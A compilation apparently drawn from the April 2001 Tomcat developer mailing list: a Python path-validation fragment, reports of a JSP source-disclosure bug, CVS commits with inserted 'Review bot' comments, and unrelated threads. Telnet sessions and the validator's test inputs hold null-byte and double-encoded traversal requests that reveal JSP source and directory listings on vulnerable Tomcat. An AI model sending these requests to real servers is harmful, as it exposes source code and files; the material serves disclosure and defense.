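def resolve_segments(path_text: str) -> str:
    """Resolve '.' and '..' segments; refuse to climb above the root."""
    stack = []
    for seg in path_text.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:
                raise RejectedPath("traversal above document root")
            stack.pop()
        else:
            stack.append(seg)
    return "/" + "/".join(stack)


def check_request_path(raw_path: str, doc_root: str = DOC_ROOT) -> str:
    """Return the filesystem path for raw_path, or raise RejectedPath."""
    # The query string is not part of the path; drop it before decoding so
    # an encoded '?' inside the path cannot be mistaken for the delimiter.
    path_part = raw_path.split("?", 1)[0]

    # Decode percent-escapes exactly once.
    decoded = unquote_to_bytes(path_part)

    # A NUL byte truncates C strings and confuses extension-based mapping
    # (".jsp%00" is matched as a JSP but opened under a shorter name).
    if b"\x00" in decoded:
        raise RejectedPath("NUL byte in path")

    lowered = decoded.lower()
    if any(token in lowered for token in SUSPICIOUS_AFTER_DECODE):
        raise RejectedPath("double-encoded path character")

    try:
        text = decoded.decode("utf-8")
    except UnicodeDecodeError as exc:
        raise RejectedPath("path is not valid UTF-8") from exc

    if "\\" in text:
        raise RejectedPath("backslash in path")

    normalized = resolve_segments(text)
    return doc_root.rstrip("/") + normalized


def verdict(raw_path: str) -> str:
    """Convenience wrapper: 'accept:<fs path>' or 'reject:<reason>'."""
    try:
        return "accept:" + check_request_path(raw_path)
    except RejectedPath as exc:
        return "reject:" + str(exc)


if __name__ == "__main__":
    # Request targets taken from the telnet sessions quoted in this thread.
    for raw in ("/examples/jsp/num/numguess.jsp",
                "/examples/jsp/num/numguess.jsp%00",
                "/%252e%252e/%252e%252e/%00.jsp",
                "/%2e%2e/%2e%2e/x.jsp"):
        print(f"{raw:40} -> {verdict(raw)}")
```

The order of the checks matters: the NUL test runs on the once-decoded bytes, so `%00` and `%2500` are both caught, and the traversal test runs on resolved segments rather than on a substring match for `..`, so a legitimate `/a/../b.jsp` is accepted while anything that would pop past the root is refused.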



Re: FW: Tomcat may reveal script source code by URL trickery 2

2001-04-04 Thread Stephan Seyboth

On Tue, Apr 03, 2001 at 04:04:46PM -0700, Jon Stevens wrote:
 
 --
 From: "Sverre H. Huseby" [EMAIL PROTECTED]
 Reply-To: "Sverre H. Huseby" [EMAIL PROTECTED]
 Date: Tue, 3 Apr 2001 10:25:26 +0200
 To: [EMAIL PROTECTED]
 Subject: Tomcat may reveal script source code by URL trickery 2

[...]

 Systems affected
 
 
 Tomcat 4.0-b2, which includes fixes for a similar bug.  Other versions
 before 4.0-b3 may be vulnerable too.
 
 The Tomcat team was notified on 2001-04-01, and they provided a fix on
 2001-04-03.  Everybody should upgrade to at least Tomcat 4.0 beta 3.

As far as I understand and can verify by testing, both Tomcat 3.2.1
and 3.2.2b2 are vulnerable to variations of this attack. What is the
correct solution for people using 3.2.1, since that is the recommended
release for production use?

$ telnet localhost 8080
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Tue, 03 Apr 2001 14:49:28 GMT
Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0; Linux 2.4.2 
i386; java.vendor=Caldera Systems Inc.)

[numguess.jsp source follows]

$ telnet localhost 8180
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp%00
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Wed, 04 Apr 2001 10:37:30 GMT
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2; Java 1.3.0; 
Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)

[numguess.jsp source follows]

Also could someone more familiar with the Tomcat code explain the
problem in more detail? I'm still new to Tomcat, so a pointer to
the relevant parts of the source would be very much appreciated.

Thanks

-- 
Stephan Seyboth - Developer
Caldera (Deutschland) GmbH
http://www.caldera.de/



RE: TC3.2.x and security problems

2001-04-04 Thread GOMEZ Henri

I can't reproduce that one, but could verify the following problems
on Linux:

$ telnet localhost 8080
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Tue, 03 Apr 2001 14:49:28 GMT
Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; 
Java 1.3.0;
Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
 
[numguess.jsp source follows]

It didn't appear in tomcat 3.3-m2




Jasper34 refactoring proposal status

2001-04-04 Thread Mel Martinez

Hi folks,

First, I want to apologize for how long it has taken
me to get this proposal done.  There have been
external factors beyond my control, but requiring my
time (more on that below).

The good news, is that it is almost done.  Also, the
level of detail should lend itself to rapid
implementation (by doing the high-level design in
Together, many of the classes are already coded and at
least stubbed).  Also, it should be possible to
develop this completely in parallel with no impact on
the current JspServlet.  Also, I should shortly have
lotsa time to devote to this.

The bad news is that the external factors are that my
company's equivalent of Daddy Warbucks (our funding
source) has gotten cold feet and I am about to become
a statistic of the fall of the dot-com economy.  :-| 
Hence the sudden 'free time'...

Should any of you know of an opening for a senior java
developer/architect/CTO/director of development
type-person, feel free to contact me and I'll be glad
to share my resume'.  My preference is for product
development and I have a high interest in building
development tools/frameworks and distributed
architectures, but I'd love to hear about any
interesting opportunity.  We currently live in
Baltimore, MD, but would consider relocating for the
right opportunity.

Also, if anybody can point me towards sites with info
and help on being an independent contractor, I'd
appreciate the tips.

Okay, sorry about the off-topic - I realize this stuff
better belongs on a Job-posting board.

I'll get back to the UML diagrams now.  :-)

mel

Dr. Mel Martinez
[EMAIL PROTECTED]






Re: Just say no to JSP Re: [Fwd: Tomcat may reveal scriptsource code by URL trickery]

2001-04-04 Thread Brad Cox

At 11:24 AM -0700 04/04/2001, Jon Stevens wrote:
I love the article title:
"Just say no to JSP"

Glad that change made it in. DDJ wanted "Just say no to HTML". Arggh.

I'm so happy to see that more and more people are waking up to the fact that
JSP is bad. I'm also happy to see you worry about form validation issues.
That is a problem that we are currently solving in Turbine right now. It is
called "Intake". :-)

I'll try to make some time to check that out.

It is sad to me that you:

#0. Apache/JServe. Can't spell the product name correctly even though it has
been around for 4+ years. :-)

Sigh. Yet another typo. I really thought we'd caught them all.

#1. Confused "Turbine" with "add programming language features to HTML".

#2. Confused "WebMacro" and thus Velocity with "add programming language
features to HTML".

If you spend time with the products, you would see that isn't the case and
you might actually retract your statements.

You've touched a nerve here. This is the amount of time that gets 
consumed installing web based infrastructures.

Maybe Turbine is an exception and I certainly hope so. I'll pick on 
Tomcat here because the wounds are still fresh from spending a whole 
week on what should be a trivial task; porting a running webapp from 
a deployment server running Linux 6.2 to the server from hell; a 
hacked "virtual" implementation of FreeBSD at HostPro.com.

I should point out at the outset that this isn't to assign blame but 
to point out a problem... namely, the complexity that developers must 
deal with to get a working infrastructure in place. My application 
uses Apache, JServ, Java, and the servlet engine from Tomcat. Period. 
No taglibs, no JSP, no XML, nothing. Yet it took a whole week to get 
even this on the air, even though I've been through the tomcat 
configuration process dozens of times by now and had working config 
files to start with.

Much of the problem was expecting the user (me) to translate 
exception backtraces into what should be done to correct the error. 
The first problem I hit was a NullPointerException while reading 
request parameters. Why? I've no idea. An unfamiliar JRE was 
preinstalled so guessing, I installed plain ol' JDK1.1.7 and that 
seemed to fix it.

Next problem was various JServ failures, none clearly explained by 
the errors, and none explaining what was wrong and how to 
correct it in the config files. Then most of the week worrying about 
why Tomcat wasn't recognizing my servlet context.

I've a bunch of ideas for partial solutions but I'll hold off on 
those to see whether there's any agreement that there's a problem 
here.

I have more comments, but no time right now and this probably isn't the
right forum anyway...

I'd be grateful to hear them when you get a moment.
-- 
---
Brad Cox, Ph.D.; [EMAIL PROTECTED]
Phone: 703 361 4751 Cell: 703 919-9623
http://superdistributed.com: A new paradigm for a new millennium



Re: Just say no to JSP Re: [Fwd: Tomcat may reveal script source code by URL trickery]

2001-04-04 Thread Earl . Stutes

An alternative view!

On  4 Apr, Brad Cox wrote:
 At 11:24 AM -0700 04/04/2001, Jon Stevens wrote:
I love the article title:
"Just say no to JSP"
I am really sorry to see folks coming on this list, and also publishing
to the general web articles deriding JSP and tomcat in particular. I
have apache-1.3.19 with tomcat-3.2.2b running behind it just fine using
mod_jk. The application running is an apache soap server. This is on a
redhat 6.2 box. I also have tomcat-4.0 running on port 7070 at the same
time where I am doing development on a secure email application. I have
moved my email app back and forth between TC3.2 and TC4.0 with no
problems. I just drop the war file in the webapps directory and tomcat
does the rest.

I do have all the latest jar files from SUNW, and jakarta-apache. So I
don't know what the problems could be. My only complaints would be not
enough debug tools around to be able to single step through new code
when you are having problems, but I consider that minor at this point,
given where the tomcat development cycle is.

I thank the tomcat developers for all their good work.

=eas=
-- 
 .
 |\
 | \  
 |  \
 |  -\
 |\  
 |  *  \ +---+
 |  \| I'd Rather Be Sailing A Laser |
 | --\   +---+
 | 83345  \  
 | \ 
 |   ---\
 |   \  
 |\[EMAIL PROTECTED]
 |-O---\
 |/w\-|
..|=|
 \   I| |
~~~




cvs commit: jakarta-tomcat-4.0/tester/web/WEB-INF web.xml

2001-04-04 Thread remm

remm01/04/04 17:06:32

  Modified:tester/src/tester/org/apache/tester Jndi01.java
   tester/web/WEB-INF web.xml
  Log:
  - Add test for bug 1202.
  
  Revision  ChangesPath
  1.2   +12 -1 
jakarta-tomcat-4.0/tester/src/tester/org/apache/tester/Jndi01.java
  
  Index: Jndi01.java
  ===
  RCS file: 
/home/cvs/jakarta-tomcat-4.0/tester/src/tester/org/apache/tester/Jndi01.java,v
  retrieving revision 1.1
  retrieving revision 1.2
  diff -u -r1.1 -r1.2
  --- Jndi01.java   2001/02/22 01:07:26 1.1
  +++ Jndi01.java   2001/04/05 00:06:31 1.2
  @@ -74,10 +74,21 @@
* should succeed.
*
* @author Craig R. McClanahan
  - * @version $Revision: 1.1 $ $Date: 2001/02/22 01:07:26 $
  + * @version $Revision: 1.2 $ $Date: 2001/04/05 00:06:31 $
*/
   
   public class Jndi01 extends HttpServlet {
  +
  +public void init() throws ServletException {
  +Context ctx = null;
  +try {
  +ctx = new InitialContext();
  +log("initialized successfully");
  +} catch (NamingException e) {
  +log("Cannot create context", e);
  +throw new ServletException(e);
  +}
  +}
   
   public void doGet(HttpServletRequest request, HttpServletResponse response)
   throws IOException, ServletException {
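Review bot: `ctx` in the new `init()` is assigned and never used, so the method only proves that `new InitialContext()` does not throw; if bug 1202 concerns a lookup that fails at startup, `init()` should go on to `ctx.lookup(...)` the name the test expects (with `ctx.close()` in a `finally`), otherwise the `Context ctx = null` initialisation and the local can be dropped. The hunk also does not show the import block, so confirm `javax.naming.Context`, `InitialContext` and `NamingException` are imported in this file.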
  
  
  
  1.18  +1 -0  jakarta-tomcat-4.0/tester/web/WEB-INF/web.xml
  
  Index: web.xml
  ===
  RCS file: /home/cvs/jakarta-tomcat-4.0/tester/web/WEB-INF/web.xml,v
  retrieving revision 1.17
  retrieving revision 1.18
  diff -u -r1.17 -r1.18
  --- web.xml   2001/03/30 21:20:04 1.17
  +++ web.xml   2001/04/05 00:06:32 1.18
  @@ -300,6 +300,7 @@
   servlet
   servlet-nameJndi01/servlet-name
   servlet-classorg.apache.tester.Jndi01/servlet-class
  +load-on-startup1/load-on-startup
   /servlet
   
   servlet
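Review bot: `load-on-startup` makes `Jndi01.init()` run at deployment, so a `NamingException` now fails the whole tester webapp instead of a single request; that is presumably the intent for the bug 1202 regression test, but the commit log should say so, and the priority value 1 should be checked against any other `load-on-startup` entries in this web.xml so the ordering is deliberate.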
  
  
  



cvs commit: jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/startup Catalina.java

2001-04-04 Thread remm

remm01/04/04 17:08:47

  Modified:catalina/src/share/org/apache/catalina/startup Catalina.java
  Log:
  - Don't set an initial context factory.
  
  Revision  ChangesPath
  1.18  +4 -6  
jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/startup/Catalina.java
  
  Index: Catalina.java
  ===
  RCS file: 
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/startup/Catalina.java,v
  retrieving revision 1.17
  retrieving revision 1.18
  diff -u -r1.17 -r1.18
  --- Catalina.java 2001/03/15 05:34:56 1.17
  +++ Catalina.java 2001/04/05 00:08:47 1.18
  @@ -1,7 +1,7 @@
   /*
  - * $Header: 
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/startup/Catalina.java,v
 1.17 2001/03/15 05:34:56 remm Exp $
  - * $Revision: 1.17 $
  - * $Date: 2001/03/15 05:34:56 $
  + * $Header: 
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/startup/Catalina.java,v
 1.18 2001/04/05 00:08:47 remm Exp $
  + * $Revision: 1.18 $
  + * $Date: 2001/04/05 00:08:47 $
*
* 
*
  @@ -97,7 +97,7 @@
* /u
*
* @author Craig R. McClanahan
  - * @version $Revision: 1.17 $ $Date: 2001/03/15 05:34:56 $
  + * @version $Revision: 1.18 $ $Date: 2001/04/05 00:08:47 $
*/
   
   public class Catalina {
  @@ -676,8 +676,6 @@
   value = value + ":" + oldValue;
   }
   System.setProperty(javax.naming.Context.URL_PKG_PREFIXES, value);
  -System.setProperty(javax.naming.Context.INITIAL_CONTEXT_FACTORY,
  -   "org.apache.naming.java.javaURLContextFactory");
   }
   
// If a SecurityManager is being used, set properties for
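Review bot: dropping the `INITIAL_CONTEXT_FACTORY` property changes behaviour for code that calls `new InitialContext().lookup(...)`: with only `URL_PKG_PREFIXES` set, names with a `java:` URL scheme still resolve through `org.apache.naming.java.javaURLContextFactory`, but a lookup of a non-URL name will now fail with `NoInitialContextException` unless a `jndi.properties` or a user-set property supplies a factory. The log line "Don't set an initial context factory" should record the reason (for instance not clobbering a factory the user configured) so the next reader does not reinstate it.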
  
  
  



Better instructions for getting JSSE/JMX?

2001-04-04 Thread Jeff Turner

Hi,

I've been trying for the last half-hour to get JSSE and JMX to build Tomcat
4.0. Could someone provide instructions for traversing the password-protected
recursive mess that is the Sun site? 

I've progressed through these pages:

http://java.sun.com/products/jsse/
http://jsecom9a.sun.com/ECom/docs/SignOn.jsp?LMLoadBalanced=LMLoadBalanced=
http://jsecom9a.sun.com/servlet/EComActionServlet/ECom.WelcomePageInfo

Where I get to this page:
   
"
   To get more information about a product, select the product from the list below:
   
   Insight Services
   Solaris 8 
   StarOffice 
   Sun GridEngine
"
   
None of these have ANY relation to getting JSSE!

So I try the "Download centre" link:
http://www.sun.com/software/shop/index.html

Which leads right back to the original page,  http://java.sun.com/products/jsse/

AAARGGHHH..


--Jeff




[PATCH] For mod_jk.c (tomcat_3.2.2)

2001-04-04 Thread Mike Anderson

Attached is a patch for mod_jk.c to more cleanly handle a bad path for the 
workers.properties file.  Currently, this is handled in jk_init and if the call to 
map_read_properties fails, then we just call jk_error_exit which in turn calls 
exit(1).  This causes some problems on NetWare because we don't go through all of the 
Apache cleanup code and so we can't restart Apache.  The attached patch just places a 
stat call in jk_set_worker_file to test for the workers.properties file.  Since this 
is called during the configuration file parse, the error is reported earlier and 
allows Apache to shut down cleanly.

I've built and tested this for NetWare, Linux, and Windows.

Mike Anderson
Senior Software Engineer
Platform Services Group
[EMAIL PROTECTED]
Novell, Inc., the leading provider of Net services software
www.novell.com



Index: mod_jk.c
===
RCS file: /home/cvspublic/jakarta-tomcat/src/native/apache1.3/Attic/mod_jk.c,v
retrieving revision 1.7.2.3
diff -u -r1.7.2.3 mod_jk.c
--- mod_jk.c2001/02/17 05:24:00 1.7.2.3
+++ mod_jk.c2001/04/04 22:18:23
@@ -477,8 +477,11 @@
 server_rec *s = cmd-server;
 jk_server_conf_t *conf =
 (jk_server_conf_t *)ap_get_module_config(s-module_config, jk_module);
+struct stat statbuf;
 
 conf-worker_file = worker_file;
+if (stat(worker_file, statbuf) == -1)
+return "Can't find the workers file specified";
 
 return NULL;
 }
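Review bot: as shown, `stat(worker_file, statbuf)` passes the struct by value; `stat(2)` takes a pointer, so this has to be `&statbuf` (and `<sys/stat.h>` must be included if it is not already). A successful `stat` only proves the file exists, not that it is readable or a regular file, so the `map_read_properties` failure path in `jk_init` still needs its own handling; and a message that names the path, e.g. `ap_psprintf(cmd->pool, "Can't find workers file %s", worker_file)`, would tell the admin which directive is wrong instead of the bare string.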



RE: TC3.2.x and security problems

2001-04-04 Thread Marc Saegesser

OK, I just tried this again (my results included inline) and in all cases I
get a 404 error.  I'm using Win2000 and JDK1.2.2.  I'll try testing with
JDK1.3 on Win2000 tomorrow and see if the problem follows the JDK version or
the operating system.


 -Original Message-
 From: Stephan Seyboth [mailto:[EMAIL PROTECTED]]
 Sent: Wednesday, April 04, 2001 9:08 AM
 To: [EMAIL PROTECTED]
 Subject: Re: TC3.2.x and security problems

[...]

 $ telnet localhost 8080
 Trying 127.0.0.1...
 Connected to localhost.
 Escape character is '^]'.
 GET /examples/jsp/num/numguess.jsp
 HTTP/1.0 200 OK
 Content-Type: text/plain
 Content-Length: 1237
 Last-Modified: Tue, 03 Apr 2001 14:49:28 GMT
 Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
 Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)

 [numguess.jsp source follows]

This one has been fixed in 3.2.2.


 $ telnet localhost 8180
 Trying 127.0.0.1...
 Connected to localhost.
 Escape character is '^]'.
 GET /examples/jsp/num/numguess.jsp%00
 HTTP/1.0 200 OK
 Content-Type: text/plain
 Content-Length: 1237
 Last-Modified: Wed, 04 Apr 2001 10:37:30 GMT
 Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
 Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)

 [numguess.jsp source follows]

My results on Win2000 with JDK1.2.2

GET /examples/jsp/num/numguess.jsp%00
HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 213
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2; Java
1.2.2
; Windows NT 5.0 x86; java.vendor=Sun Microsystems Inc.)

<head><title>Not Found (404)</title></head>
<body><h1>Not Found (404)</h1>
<b>Original request:</b> /examples/jsp/num/numguess.jsp%00<br><br>
<b>Not found request:</b> /examples/jsp/num/numguess.jsp%00</body>


 $ telnet localhost 8180
 Trying 127.0.0.1...
 Connected to localhost.
 Escape character is '^]'.
 GET /%252e%252e/%252e%252e/%00.jsp

 HTTP/1.0 200 OK
 Content-Type: text/html;charset=ISO-8859-1
 Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
 Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)

 [directory listing follows]

My results on Win2000 with JDK1.2.2.

GET /%252e%252e/%252e%252e/%00.jsp
HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 207
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2; Java
1.2.2
; Windows NT 5.0 x86; java.vendor=Sun Microsystems Inc.)

<head><title>Not Found (404)</title></head>
<body><h1>Not Found (404)</h1>
<b>Original request:</b> /%252e%252e/%252e%252e/%00.jsp<br><br>
<b>Not found request:</b> /%252e%252e/%252e%252e/%00.jsp</body>

I don't have JDK 1.3 on this machine so I'll have to wait until tomorrow to
see if the problem behavior follows the JDK version or the operating system.




Re: 'Just say no to JSP' Re: [Fwd: Tomcat may reveal script source code by URL trickery]

2001-04-04 Thread Nick Bauman

Read Jon's article about the problems of JSP.

http://jakarta.apache.org/velocity/ymtd/ymtd.html

I read it and it made me rethink a lot of assumptions I had made about JSP.

 An alternative view!
 
 On  4 Apr, Brad Cox wrote:
 At 11:24 AM -0700 04/04/2001, Jon Stevens wrote:
I love the article title:
"Just say no to JSP"
 I am really sorry to see folks coming on this list, and also publishing
 to the general web articles deriding JSP and tomcat in particular. I
 have apache-1.3.19 with tomcat-3.2.2b running behind it just fine using
 mod_jk. The application running is an apache soap server This is on a
 redhat 6.2 box. I also have tomcat-4.0 running on port 7070 at the same
 time where I am doing development on a secure email application. I have
 moved my email app back and forth between TC3.2 and TC4.0 with no
 problems. I just drop the war file in the webapps directory and tomcat
 does the rest.
 
 I do have all the latest jar files from SUNW, and jakarta-apache. So I
 don't know what the problems could be. My only complaints would be not
 enough debug tools around to be able to single step through new code
 when you are having problems, but I consider that minor at this point,
 given where the tomcat development cycle is.
 
 I think the tomcat developers for all their good work.
 
 =eas=
 -- 
  .
  |
  |   
  |  
  |  -
  |  
  |  *   +---+
  |  | I'd Rather Be Sailing A Laser |
  | --   +---+
  | 83345
  |  
  |   ---
  | 
  |[EMAIL PROTECTED]
  |-O---
  |/w-|
 ..|=|
 I| |
 ~~~


-- 
Nick Bauman
Software Developer
3023 Lynn #22
Minneapolis, MN
55416
Mobile Phone: (612) 810-7406




cvs commit: jakarta-tomcat/src/native/mod_jk/apache2.0 mod_jk.c

2001-04-04 Thread hgomez

hgomez  01/04/04 22:27:53

  Modified:src/native/mod_jk/apache1.3 mod_jk.c
   src/native/mod_jk/apache2.0 mod_jk.c
  Log:
  Clean handle of bad path to workers.properties file.
  Fix cleanup problem on Netware
  Submitted by: Mike Anderson
  
  Revision  ChangesPath
  1.8   +5 -0  jakarta-tomcat/src/native/mod_jk/apache1.3/mod_jk.c
  
  Index: mod_jk.c
  ===
  RCS file: /home/cvs/jakarta-tomcat/src/native/mod_jk/apache1.3/mod_jk.c,v
  retrieving revision 1.7
  retrieving revision 1.8
  diff -u -r1.7 -r1.8
  --- mod_jk.c  2001/03/27 22:01:18 1.7
  +++ mod_jk.c  2001/04/05 05:27:52 1.8
  @@ -580,10 +580,15 @@
 char *worker_file)
   {
   server_rec *s = cmd-server;
  +struct stat statbuf;
  +
   jk_server_conf_t *conf =
   (jk_server_conf_t *)ap_get_module_config(s-module_config, jk_module);
   
   conf-worker_file = worker_file;
  +
  +if (stat(worker_file, statbuf) == -1)
  +return "Can't find the workers file specified";
   
   return NULL;
   }
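Review bot: the check runs after `conf-worker_file = worker_file;`, so a bad path is stored in the server config before it is rejected; moving the `stat` above the assignment is cleaner even though Apache aborts configuration on a non-NULL return. `stat(worker_file, statbuf)` must take `&statbuf`, and testing `S_ISREG(statbuf.st_mode)` afterwards would also catch a directory given by mistake, which a bare `stat` accepts.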
  
  
  
  1.12  +5 -0  jakarta-tomcat/src/native/mod_jk/apache2.0/mod_jk.c
  
  Index: mod_jk.c
  ===
  RCS file: /home/cvs/jakarta-tomcat/src/native/mod_jk/apache2.0/mod_jk.c,v
  retrieving revision 1.11
  retrieving revision 1.12
  diff -u -r1.11 -r1.12
  --- mod_jk.c  2001/04/02 08:26:25 1.11
  +++ mod_jk.c  2001/04/05 05:27:53 1.12
  @@ -450,10 +450,15 @@
 char *worker_file)
   {
   server_rec *s = cmd-server;
  +struct stat statbuf;
  +
   jk_server_conf_t *conf =
   (jk_server_conf_t *)ap_get_module_config(s-module_config, jk_module);
   
   conf-worker_file = worker_file;
  +
  +if (stat(worker_file, statbuf) == -1)
  +return "Can't find the workers file specified";
   
   return NULL;
   }
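Review bot: the Apache 2.0 module builds on APR, so `apr_stat(&finfo, worker_file, APR_FINFO_MIN, cmd->pool)` with an `apr_finfo_t` is the portable call here rather than raw `stat()` and `struct stat`; platform differences of the kind that motivated this patch on NetWare are exactly what APR hides. If plain `stat` is kept, it needs `&statbuf`, as the visible line passes the struct by value.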
  
  
  



RE: [PATCH] For mod_jk.c (tomcat_3.2.2)

2001-04-04 Thread GOMEZ Henri

Attached is a patch for mod_jk.c to more cleanly handle a bad 
path for the workers.properties file.  Currently, this is 
handled in jk_init and if the call to map_read_properties 
fails, then we just call jk_error_exit which in turn calls 
exit(1).  This causes some problems on NetWare because we 
don't go through all of the Apache cleanup code and so we 
can't restart Apache.  The attached patch just places a stat 
call in jk_set_worker_file to test for the workers.properties 
file.  Since this is called during the configuration file 
parse, the error is reported earlier and allows Apache to 
shut down cleanly.

I've built and tested this for NetWare, Linux, and Windows.

Committed to Tomcat 3.3 branch for apache 1.3 and 2.0

Thanks